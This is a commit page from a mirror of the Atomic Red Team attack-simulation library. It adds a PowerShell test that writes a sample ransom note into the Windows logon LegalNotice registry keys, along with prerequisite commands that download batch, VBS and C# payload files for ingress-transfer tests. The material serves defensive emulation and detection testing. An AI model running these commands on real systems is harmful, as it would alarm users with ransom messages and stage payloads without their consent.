security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge branch 'master' into T1201_Improved

Browse Source
This commit is contained in:
Jose Enrique Hernandez
2022-10-18 21:41:30 -04:00
committed by GitHub
parent e774b3cdc9 69028837c2
commit 9c3f3e6b9e
20 changed files with 295 additions and 8 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
+1 -1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
+1 -1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Indexes-CSV/index.csv
+1
View File
@@ -1339,6 +1339,7 @@ impact,T1489,Service Stop,1,Windows - Stop service using Service Controller,21df
impact,T1489,Service Stop,2,Windows - Stop service using net.exe,41274289-ec9c-4213-bea4-e43c4aa57954,command_prompt
impact,T1489,Service Stop,3,Windows - Stop service by killing process,f3191b84-c38b-400b-867e-3a217a27795f,command_prompt
impact,T1491.001,Defacement: Internal Defacement,1,Replace Desktop Wallpaper,30558d53-9d76-41c4-9267-a7bd5184bed3,powershell
impact,T1491.001,Defacement: Internal Defacement,2,Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message,ffcbfaab-c9ff-470b-928c-f086b326089b,powershell
impact,T1531,Account Access Removal,1,Change User Password - Windows,1b99ef28-f83c-4ec5-8a08-1a56263a5bb2,command_prompt
impact,T1531,Account Access Removal,2,Delete User - Windows,f21a1d7d-a62f-442a-8c3a-2440d43b19e5,command_prompt
impact,T1531,Account Access Removal,3,Remove Account From Domain Admin Group,43f71395-6c37-498e-ab17-897d814a0947,powershell
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
1339 impact T1489 Service Stop 2 Windows - Stop service using net.exe 41274289-ec9c-4213-bea4-e43c4aa57954 command_prompt
1340 impact T1489 Service Stop 3 Windows - Stop service by killing process f3191b84-c38b-400b-867e-3a217a27795f command_prompt
1341 impact T1491.001 Defacement: Internal Defacement 1 Replace Desktop Wallpaper 30558d53-9d76-41c4-9267-a7bd5184bed3 powershell
1342 impact T1491.001 Defacement: Internal Defacement 2 Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message ffcbfaab-c9ff-470b-928c-f086b326089b powershell
1343 impact T1531 Account Access Removal 1 Change User Password - Windows 1b99ef28-f83c-4ec5-8a08-1a56263a5bb2 command_prompt
1344 impact T1531 Account Access Removal 2 Delete User - Windows f21a1d7d-a62f-442a-8c3a-2440d43b19e5 command_prompt
1345 impact T1531 Account Access Removal 3 Remove Account From Domain Admin Group 43f71395-6c37-498e-ab17-897d814a0947 powershell
atomics/Indexes/Indexes-CSV/windows-index.csv
+1
View File
@@ -974,6 +974,7 @@ impact,T1489,Service Stop,1,Windows - Stop service using Service Controller,21df
impact,T1489,Service Stop,2,Windows - Stop service using net.exe,41274289-ec9c-4213-bea4-e43c4aa57954,command_prompt
impact,T1489,Service Stop,3,Windows - Stop service by killing process,f3191b84-c38b-400b-867e-3a217a27795f,command_prompt
impact,T1491.001,Defacement: Internal Defacement,1,Replace Desktop Wallpaper,30558d53-9d76-41c4-9267-a7bd5184bed3,powershell
impact,T1491.001,Defacement: Internal Defacement,2,Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message,ffcbfaab-c9ff-470b-928c-f086b326089b,powershell
impact,T1531,Account Access Removal,1,Change User Password - Windows,1b99ef28-f83c-4ec5-8a08-1a56263a5bb2,command_prompt
impact,T1531,Account Access Removal,2,Delete User - Windows,f21a1d7d-a62f-442a-8c3a-2440d43b19e5,command_prompt
impact,T1531,Account Access Removal,3,Remove Account From Domain Admin Group,43f71395-6c37-498e-ab17-897d814a0947,powershell
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
974 impact T1489 Service Stop 2 Windows - Stop service using net.exe 41274289-ec9c-4213-bea4-e43c4aa57954 command_prompt
975 impact T1489 Service Stop 3 Windows - Stop service by killing process f3191b84-c38b-400b-867e-3a217a27795f command_prompt
976 impact T1491.001 Defacement: Internal Defacement 1 Replace Desktop Wallpaper 30558d53-9d76-41c4-9267-a7bd5184bed3 powershell
977 impact T1491.001 Defacement: Internal Defacement 2 Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message ffcbfaab-c9ff-470b-928c-f086b326089b powershell
978 impact T1531 Account Access Removal 1 Change User Password - Windows 1b99ef28-f83c-4ec5-8a08-1a56263a5bb2 command_prompt
979 impact T1531 Account Access Removal 2 Delete User - Windows f21a1d7d-a62f-442a-8c3a-2440d43b19e5 command_prompt
980 impact T1531 Account Access Removal 3 Remove Account From Domain Admin Group 43f71395-6c37-498e-ab17-897d814a0947 powershell
atomics/Indexes/Indexes-Markdown/index.md
+1
View File
@@ -2250,6 +2250,7 @@
- T1491 Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1491.001 Defacement: Internal Defacement](../../T1491.001/T1491.001.md)
- Atomic Test #1: Replace Desktop Wallpaper [windows]
- Atomic Test #2: Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message [windows]
- T1565 Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1531 Account Access Removal](../../T1531/T1531.md)
- Atomic Test #1: Change User Password - Windows [windows]
atomics/Indexes/Indexes-Markdown/windows-index.md
+1
View File
@@ -1611,6 +1611,7 @@
- T1491 Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1491.001 Defacement: Internal Defacement](../../T1491.001/T1491.001.md)
- Atomic Test #1: Replace Desktop Wallpaper [windows]
- Atomic Test #2: Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message [windows]
- T1565 Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1531 Account Access Removal](../../T1531/T1531.md)
- Atomic Test #1: Change User Password - Windows [windows]
atomics/Indexes/index.yaml
+89 -2
View File
@@ -1735,7 +1735,7 @@ defense-evasion:
- name: dynamic-linker based rootkit (libprocesshider)
auto_generated_guid: 1338bf0c-fd0c-48c0-9e65-329f18e2c0d3
description: 'Uses libprocesshider to simulate rootkit behavior by hiding a
specific process name via ls.so.preload (see also T1574.006).
specific process name via ld.so.preload (see also T1574.006).
'
supported_platforms:
@@ -43831,6 +43831,15 @@ execution:
description: Location of the payload
type: Path
default: "%tmp%\\T1106.exe"
dependency_executor_name: powershell
dependencies:
- description: "#{source_file} must exist on system.\n"
prereq_command: 'if (Test-Path #{source_file}) {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1106/src/CreateProcess.cs" -OutFile "#{source_file}"
executor:
command: |
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:"#{output_file}" /target:exe #{source_file}
@@ -55375,7 +55384,7 @@ persistence:
name: bash
elevation_required: false
command: 'if [ -f ~/.ssh/authorized_keys ]; then ssh_authorized_keys=$(cat
~/.ssh/authorized_keys); echo $ssh_authorized_keys > ~/.ssh/authorized_keys;
~/.ssh/authorized_keys); echo "$ssh_authorized_keys" > ~/.ssh/authorized_keys;
fi;
'
@@ -92314,6 +92323,16 @@ command-and-control:
get_prereq_command: 'Invoke-WebRequest -OutFile "$env:UserProfile\Downloads\psiphon3.exe"
"https://s3.amazonaws.com/0ubz-2q11-gi9y/psiphon3.exe"
'
- description: "Batch file containing commands to run must be in src directory
\n"
prereq_command: 'if (Test-Path PathToAtomicsFolder\T1090.003\src\Psiphon.bat)
{exit 0} else {exit 1}
'
get_prereq_command: 'Invoke-WebRequest -OutFile "PathToAtomicsFolder\T1090.003\src\Psiphon.bat"
"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1090.003/src/Psiphon.bat"
'
executor:
name: powershell
@@ -93920,6 +93939,15 @@ command-and-control:
description: Path to the Batch script
type: Path
default: PathToAtomicsFolder\T1105\src\T1105.bat
dependency_executor_name: powershell
dependencies:
- description: "#{Path_to_file} must exist on system.\n"
prereq_command: 'if (Test-Path #{Path_to_file}) {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path #{Path_to_file}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/T1105.bat" -OutFile "#{Path_to_file}"
executor:
command: "#{Path_to_file} 1>NUL \n"
cleanup_command: |
@@ -94028,6 +94056,15 @@ command-and-control:
description: Path to replace.exe
type: Path
default: C:\Windows\System32\replace.exe
dependency_executor_name: powershell
dependencies:
- description: "#{replace_cab} must exist on system.\n"
prereq_command: 'if (Test-Path #{replace_cab}) {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path #{replace_cab}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/redcanary.cab" -OutFile "#{replace_cab}"
executor:
command: |
del %TEMP%\redcanary.cab >nul 2>&1
@@ -94089,6 +94126,15 @@ command-and-control:
description: Full path to the VisualBasic downloading the file
type: String
default: PathToAtomicsFolder\T1105\src\T1105-download-file.vbs
dependency_executor_name: powershell
dependencies:
- description: "#{vbscript_file} must be exist on system.\n"
prereq_command: 'if (Test-Path #{vbscript_file}) {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path #{vbscript_file}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/T1105-download-file.vbs" -OutFile "#{vbscript_file}"
executor:
command: 'wscript.exe #{vbscript_file}'
cleanup_command: del Atomic-License.txt >nul 2>&1
@@ -97673,6 +97719,47 @@ impact:
\"#{pointer_to_orginal_wallpaper}\" -ErrorAction Ignore\nRemove-Item \"#{wallpaper_location}\"
-ErrorAction Ignore\n"
name: powershell
- name: Configure LegalNoticeCaption and LegalNoticeText registry keys to display
ransom message
auto_generated_guid: ffcbfaab-c9ff-470b-928c-f086b326089b
description: "Display ransom message to users at system start-up by configuring
registry keys HKLM\\SOFTWARE\\Micosoft\\Windows\\CurrentVersion\\Policies\\System\\LegalNoticeCaption
and HKLM\\SOFTWARE\\Micosoft\\Windows\\CurrentVersion\\Policies\\System\\LegalNoticeText.\n\n[SynAck
Ransomware](https://www.trendmicro.com/vinfo/es/security/news/cybercrime-and-digital-threats/synack-ransomware-leverages-process-doppelg-nging-for-evasion-and-infection),
\n[Grief Ransomware](https://redcanary.com/blog/grief-ransomware/), \n[Maze
Ransomware](https://cyware.com/research-and-analysis/maze-ransomware-a-deadly-combination-of-data-theft-and-encryption-to-target-us-organizations-8f27),\n[Pysa
Ransomware](https://www.cybereason.com/blog/research/threat-analysis-report-inside-the-destructive-pysa-ransomware),\n[Spook
Ransomware](https://community.fortinet.com/t5/FortiEDR/Threat-Coverage-How-FortiEDR-protects-against-Spook-Ransomware/ta-p/204226),\n[DopplePaymer
Ransomware](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Dopplepaymer&threatId=-2147221958),\n[Reedemer
Ransomware](https://blog.cyble.com/2022/07/20/redeemer-ransomware-back-action/),\n[Kangaroo
Ransomware](https://www.bleepingcomputer.com/news/security/the-kangaroo-ransomware-not-only-encrypts-your-data-but-tries-to-lock-you-out-of-windows/)\n"
supported_platforms:
- windows
input_arguments:
legal_notice_caption:
description: Title of ransom message
type: String
default: PYSA
legal_notice_text:
description: Body of ransom message
type: String
default: Hi Company, every byte on any types of your devices was encrypted.
Don't try to use backups because it were encrypted too. To get all your
data contact us:xxxx@onionmail.org
executor:
command: "$orgLegalNoticeCaption = (Get-ItemProperty HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System
-Name LegalNoticeCaption).LegalNoticeCaption\n$orgLegalNoticeText = (Get-ItemProperty
HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System -Name
LegalNoticeText).LegalNoticeText\n$newLegalNoticeCaption = \"#{legal_notice_caption}\"\n$newLegalNoticeText
= \"#{legal_notice_text}\"\nSet-ItemProperty HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System
-Name LegalNoticeCaption -Value $newLegalNoticeCaption -Type String -Force\nSet-ItemProperty
HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System -Name
LegalNoticeText -Value $newLegalNoticeText -Type String -Force "
cleanup_command: |
Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeCaption -Value $orgLegalNoticeCaption -Type String -Force
Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeText -Value $orgLegalNoticeText -Type String -Force
name: powershell
elevation_required: true
T1565:
technique:
x_mitre_platforms:
atomics/T1014/T1014.md
+1 -1
View File
@@ -137,7 +137,7 @@ sudo depmod -a
<br/>
## Atomic Test #3 - dynamic-linker based rootkit (libprocesshider)
Uses libprocesshider to simulate rootkit behavior by hiding a specific process name via ls.so.preload (see also T1574.006).
Uses libprocesshider to simulate rootkit behavior by hiding a specific process name via ld.so.preload (see also T1574.006).
**Supported Platforms:** Linux
atomics/T1014/T1014.yaml
+1 -1
View File
@@ -89,7 +89,7 @@ atomic_tests:
- name: dynamic-linker based rootkit (libprocesshider)
auto_generated_guid: 1338bf0c-fd0c-48c0-9e65-329f18e2c0d3
description: |
Uses libprocesshider to simulate rootkit behavior by hiding a specific process name via ls.so.preload (see also T1574.006).
Uses libprocesshider to simulate rootkit behavior by hiding a specific process name via ld.so.preload (see also T1574.006).
supported_platforms:
- linux
input_arguments:
atomics/T1090.003/T1090.003.md
+9
View File
@@ -72,6 +72,15 @@ if (Test-Path $env:UserProfile\Downloads\psiphon3.exe) {exit 0} else {exit 1}
```powershell
Invoke-WebRequest -OutFile "$env:UserProfile\Downloads\psiphon3.exe" "https://s3.amazonaws.com/0ubz-2q11-gi9y/psiphon3.exe"
```
##### Description: Batch file containing commands to run must be in src directory
##### Check Prereq Commands:
```powershell
if (Test-Path PathToAtomicsFolder\T1090.003\src\Psiphon.bat) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
Invoke-WebRequest -OutFile "PathToAtomicsFolder\T1090.003\src\Psiphon.bat" "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1090.003/src/Psiphon.bat"
```
atomics/T1090.003/T1090.003.yaml
+6
View File
@@ -28,6 +28,12 @@ atomic_tests:
if (Test-Path $env:UserProfile\Downloads\psiphon3.exe) {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest -OutFile "$env:UserProfile\Downloads\psiphon3.exe" "https://s3.amazonaws.com/0ubz-2q11-gi9y/psiphon3.exe"
- description: |
Batch file containing commands to run must be in src directory
prereq_command: |
if (Test-Path PathToAtomicsFolder\T1090.003\src\Psiphon.bat) {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest -OutFile "PathToAtomicsFolder\T1090.003\src\Psiphon.bat" "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1090.003/src/Psiphon.bat"
executor:
name: powershell
command: |
atomics/T1098.004/T1098.004.md
+1 -1
View File
@@ -31,7 +31,7 @@ If the user is able to save the same contents in the authorized_keys file, it sh
```bash
if [ -f ~/.ssh/authorized_keys ]; then ssh_authorized_keys=$(cat ~/.ssh/authorized_keys); echo $ssh_authorized_keys > ~/.ssh/authorized_keys; fi;
if [ -f ~/.ssh/authorized_keys ]; then ssh_authorized_keys=$(cat ~/.ssh/authorized_keys); echo "$ssh_authorized_keys" > ~/.ssh/authorized_keys; fi;
```
#### Cleanup Commands:
atomics/T1098.004/T1098.004.yaml
+1 -1
View File
@@ -15,6 +15,6 @@ atomic_tests:
name: bash
elevation_required: false
command: |
if [ -f ~/.ssh/authorized_keys ]; then ssh_authorized_keys=$(cat ~/.ssh/authorized_keys); echo $ssh_authorized_keys > ~/.ssh/authorized_keys; fi;
if [ -f ~/.ssh/authorized_keys ]; then ssh_authorized_keys=$(cat ~/.ssh/authorized_keys); echo "$ssh_authorized_keys" > ~/.ssh/authorized_keys; fi;
cleanup_command: |
unset ssh_authorized_keys
atomics/T1105/T1105.md
+39
View File
@@ -901,6 +901,19 @@ rmdir /s/q %temp%\T1105 >nul 2>&1
#### Dependencies: Run with `powershell`!
##### Description: #{Path_to_file} must exist on system.
##### Check Prereq Commands:
```powershell
if (Test-Path #{Path_to_file}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path #{Path_to_file}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/T1105.bat" -OutFile "#{Path_to_file}"
```
<br/>
@@ -1057,6 +1070,19 @@ del %TEMP%\redcanary.cab >nul 2>&1
#### Dependencies: Run with `powershell`!
##### Description: #{replace_cab} must exist on system.
##### Check Prereq Commands:
```powershell
if (Test-Path #{replace_cab}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path #{replace_cab}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/redcanary.cab" -OutFile "#{replace_cab}"
```
<br/>
@@ -1172,6 +1198,19 @@ del Atomic-License.txt >nul 2>&1
#### Dependencies: Run with `powershell`!
##### Description: #{vbscript_file} must be exist on system.
##### Check Prereq Commands:
```powershell
if (Test-Path #{vbscript_file}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path #{vbscript_file}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/T1105-download-file.vbs" -OutFile "#{vbscript_file}"
```
<br/>
atomics/T1105/T1105.yaml
+27
View File
@@ -542,6 +542,15 @@ atomic_tests:
description: Path to the Batch script
type: Path
default: PathToAtomicsFolder\T1105\src\T1105.bat
dependency_executor_name: powershell
dependencies:
- description: |
#{Path_to_file} must exist on system.
prereq_command: |
if (Test-Path #{Path_to_file}) {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path #{Path_to_file}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/T1105.bat" -OutFile "#{Path_to_file}"
executor:
command: |
#{Path_to_file} 1>NUL
@@ -646,6 +655,15 @@ atomic_tests:
description: Path to replace.exe
type: Path
default: C:\Windows\System32\replace.exe
dependency_executor_name: powershell
dependencies:
- description: |
#{replace_cab} must exist on system.
prereq_command: |
if (Test-Path #{replace_cab}) {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path #{replace_cab}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/redcanary.cab" -OutFile "#{replace_cab}"
executor:
command: |
del %TEMP%\redcanary.cab >nul 2>&1
@@ -707,6 +725,15 @@ atomic_tests:
description: Full path to the VisualBasic downloading the file
type: String
default: PathToAtomicsFolder\T1105\src\T1105-download-file.vbs
dependency_executor_name: powershell
dependencies:
- description: |
#{vbscript_file} must be exist on system.
prereq_command: |
if (Test-Path #{vbscript_file}) {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path #{vbscript_file}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/T1105-download-file.vbs" -OutFile "#{vbscript_file}"
executor:
command: 'wscript.exe #{vbscript_file}'
cleanup_command: del Atomic-License.txt >nul 2>&1
atomics/T1106/T1106.md
+13
View File
@@ -51,6 +51,19 @@ C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:"#{output_file}" /tar
#### Dependencies: Run with `powershell`!
##### Description: #{source_file} must exist on system.
##### Check Prereq Commands:
```powershell
if (Test-Path #{source_file}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1106/src/CreateProcess.cs" -OutFile "#{source_file}"
```
<br/>
atomics/T1106/T1106.yaml
+9
View File
@@ -15,6 +15,15 @@ atomic_tests:
description: Location of the payload
type: Path
default: '%tmp%\T1106.exe'
dependency_executor_name: powershell
dependencies:
- description: |
#{source_file} must exist on system.
prereq_command: |
if (Test-Path #{source_file}) {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1106/src/CreateProcess.cs" -OutFile "#{source_file}"
executor:
command: |
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:"#{output_file}" /target:exe #{source_file}
atomics/T1491.001/T1491.001.md
+55
View File
@@ -6,6 +6,8 @@
- [Atomic Test #1 - Replace Desktop Wallpaper](#atomic-test-1---replace-desktop-wallpaper)
- [Atomic Test #2 - Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message](#atomic-test-2---configure-legalnoticecaption-and-legalnoticetext-registry-keys-to-display-ransom-message)
<br/>
@@ -96,4 +98,57 @@ Remove-Item "#{wallpaper_location}" -ErrorAction Ignore
<br/>
<br/>
## Atomic Test #2 - Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message
Display ransom message to users at system start-up by configuring registry keys HKLM\SOFTWARE\Micosoft\Windows\CurrentVersion\Policies\System\LegalNoticeCaption and HKLM\SOFTWARE\Micosoft\Windows\CurrentVersion\Policies\System\LegalNoticeText.
[SynAck Ransomware](https://www.trendmicro.com/vinfo/es/security/news/cybercrime-and-digital-threats/synack-ransomware-leverages-process-doppelg-nging-for-evasion-and-infection),
[Grief Ransomware](https://redcanary.com/blog/grief-ransomware/),
[Maze Ransomware](https://cyware.com/research-and-analysis/maze-ransomware-a-deadly-combination-of-data-theft-and-encryption-to-target-us-organizations-8f27),
[Pysa Ransomware](https://www.cybereason.com/blog/research/threat-analysis-report-inside-the-destructive-pysa-ransomware),
[Spook Ransomware](https://community.fortinet.com/t5/FortiEDR/Threat-Coverage-How-FortiEDR-protects-against-Spook-Ransomware/ta-p/204226),
[DopplePaymer Ransomware](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Dopplepaymer&threatId=-2147221958),
[Reedemer Ransomware](https://blog.cyble.com/2022/07/20/redeemer-ransomware-back-action/),
[Kangaroo Ransomware](https://www.bleepingcomputer.com/news/security/the-kangaroo-ransomware-not-only-encrypts-your-data-but-tries-to-lock-you-out-of-windows/)
**Supported Platforms:** Windows
**auto_generated_guid:** ffcbfaab-c9ff-470b-928c-f086b326089b
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| legal_notice_caption | Title of ransom message | String | PYSA|
| legal_notice_text | Body of ransom message | String | Hi Company, every byte on any types of your devices was encrypted. Don't try to use backups because it were encrypted too. To get all your data contact us:xxxx@onionmail.org|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
$orgLegalNoticeCaption = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeCaption).LegalNoticeCaption
$orgLegalNoticeText = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeText).LegalNoticeText
$newLegalNoticeCaption = "#{legal_notice_caption}"
$newLegalNoticeText = "#{legal_notice_text}"
Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeCaption -Value $newLegalNoticeCaption -Type String -Force
Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeText -Value $newLegalNoticeText -Type String -Force
```
#### Cleanup Commands:
```powershell
Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeCaption -Value $orgLegalNoticeCaption -Type String -Force
Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeText -Value $orgLegalNoticeText -Type String -Force
```
<br/>
atomics/T1491.001/T1491.001.yaml
+37
View File
@@ -77,3 +77,40 @@ atomic_tests:
Remove-Item "#{pointer_to_orginal_wallpaper}" -ErrorAction Ignore
Remove-Item "#{wallpaper_location}" -ErrorAction Ignore
name: powershell
- name: Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message
auto_generated_guid: ffcbfaab-c9ff-470b-928c-f086b326089b
description: |
Display ransom message to users at system start-up by configuring registry keys HKLM\SOFTWARE\Micosoft\Windows\CurrentVersion\Policies\System\LegalNoticeCaption and HKLM\SOFTWARE\Micosoft\Windows\CurrentVersion\Policies\System\LegalNoticeText.
[SynAck Ransomware](https://www.trendmicro.com/vinfo/es/security/news/cybercrime-and-digital-threats/synack-ransomware-leverages-process-doppelg-nging-for-evasion-and-infection),
[Grief Ransomware](https://redcanary.com/blog/grief-ransomware/),
[Maze Ransomware](https://cyware.com/research-and-analysis/maze-ransomware-a-deadly-combination-of-data-theft-and-encryption-to-target-us-organizations-8f27),
[Pysa Ransomware](https://www.cybereason.com/blog/research/threat-analysis-report-inside-the-destructive-pysa-ransomware),
[Spook Ransomware](https://community.fortinet.com/t5/FortiEDR/Threat-Coverage-How-FortiEDR-protects-against-Spook-Ransomware/ta-p/204226),
[DopplePaymer Ransomware](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Dopplepaymer&threatId=-2147221958),
[Reedemer Ransomware](https://blog.cyble.com/2022/07/20/redeemer-ransomware-back-action/),
[Kangaroo Ransomware](https://www.bleepingcomputer.com/news/security/the-kangaroo-ransomware-not-only-encrypts-your-data-but-tries-to-lock-you-out-of-windows/)
supported_platforms:
- windows
input_arguments:
legal_notice_caption:
description: Title of ransom message
type: String
default: PYSA
legal_notice_text:
description: Body of ransom message
type: String
default: "Hi Company, every byte on any types of your devices was encrypted. Don't try to use backups because it were encrypted too. To get all your data contact us:xxxx@onionmail.org"
executor:
command: |-
$orgLegalNoticeCaption = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeCaption).LegalNoticeCaption
$orgLegalNoticeText = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeText).LegalNoticeText
$newLegalNoticeCaption = "#{legal_notice_caption}"
$newLegalNoticeText = "#{legal_notice_text}"
Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeCaption -Value $newLegalNoticeCaption -Type String -Force
Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeText -Value $newLegalNoticeText -Type String -Force
cleanup_command: |
Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeCaption -Value $orgLegalNoticeCaption -Type String -Force
Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeText -Value $orgLegalNoticeText -Type String -Force
name: powershell
elevation_required: true
atomics/used_guids.txt
+1
View File
@@ -1161,3 +1161,4 @@ c01cad7f-7a4c-49df-985e-b190dcf6a279
c7a0bb71-70ce-4a53-b115-881f241b795b
24fd9719-7419-42dd-bce6-ab3463110b3c
251c5936-569f-42f4-9ac2-87a173b9e9b8
ffcbfaab-c9ff-470b-928c-f086b326089b